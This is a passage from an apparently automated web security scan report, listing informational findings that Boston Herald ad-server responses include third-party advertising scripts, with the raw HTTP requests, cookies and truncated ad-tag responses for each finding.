document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_728X90_ATF | http://www.bostonherald.com/ | 728 x 90 Leaderboard -->\n');
document.write ('<script type="text/javascript">\n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.89. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Bottom

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Right,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fnational%2Fremembering_911%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.24.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:04:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_728x90_ROS | http://www.bostonherald.com/ | 728 x 90 Leaderboard -->\n');
document.write ('<script type="text/javascript">\n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.90. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Right,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fnational%2Fremembering_911%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.24.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:04:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_300x250_ATF | http://www.bostonherald.com/ | 300 x 250 Sidekick -->\n');
document.write ('<script type="text/javascript">\n');
documen
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.91. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Middle1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Right,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fnational%2Fremembering_911%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.24.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:04:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_300x250_ROS | http://www.bostonherald.com/ | 300 x 250 Sidekick -->\n');
document.write ('<script type="text/javascript">\n');
documen
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.92. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Right,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fnational%2Fremembering_911%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.24.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:04:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_728X90_ATF | http://www.bostonherald.com/ | 728 x 90 Leaderboard -->\n');
document.write ('<script type="text/javascript">\n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.93. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; RMFD=011R4jGHO101yed8|O1021J7A; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:30 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O1021J78|O1021J7A|O1021J7F|O10226Kk; expires=Tue, 17-Sep-13 01:00:30 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1539
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/news;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/regional/article/L46/1375533115/Middle/BostonHerald/quadrant1_newsROS300x250a_2010/quadrant1_newsROS300x250a_0608.html/4d686437616b35776e72734144666853?;ord=1375533115?" type="text/javascript"></script>
...[SNIP]...

18.94. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Right  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Right

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Right HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; RMFD=011R4jGHO101yed8|O1021J7A; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 607
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_160x600_ATF | http://www.bostonherald.com/ | 160 x 600 Wide Skyscraper -->\n');
document.write ('<script type="text/javascript">\n');

...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.95. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; RMFD=011R4jGHO101yed8|O1021J7A; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:28 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O1021J7A|O1021J7F; expires=Tue, 17-Sep-13 01:00:28 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1510
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/news;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/regional/article/L46/293816110/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=293816110?" type="text/javascript"></script>
...[SNIP]...

18.96. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/sports/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/sports/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/sports/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/sports/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.42.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:07:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_300x250_ATF | http://www.bostonherald.com/ | 300 x 250 Sidekick -->\n');
document.write ('<script type="text/javascript">\n');
documen
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.97. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.12.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O1021J3t|O2021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:02:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_728x90_ROS | http://www.bostonherald.com/ | 728 x 90 Leaderboard -->\n');
document.write ('<script type="text/javascript">\n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.98. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O1021J3t|O2021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.15.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:03:34 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O2021J3t|O2021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; expires=Tue, 17-Sep-13 01:03:34 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1484
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/298814777/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/4d686437616b35776e72734144666853?;ord=298814777?" type="text/javascript"></script>
...[SNIP]...

18.99. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.9.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O2021J78|O2021J7A|O2021J7F|O20226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:02:10 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O1021J3t|O2021J78|O2021J7A|O2021J7F|O20226Kk; expires=Tue, 17-Sep-13 01:02:10 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1491
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1813138297/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/4d686437616b35776e72734144666853?;ord=1813138297?" type="text/javascript"></script>
...[SNIP]...

18.100. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.29.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:06:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_300x250_ATF | http://www.bostonherald.com/ | 300 x 250 Sidekick -->\n');
document.write ('<script type="text/javascript">\n');
documen
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.101. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
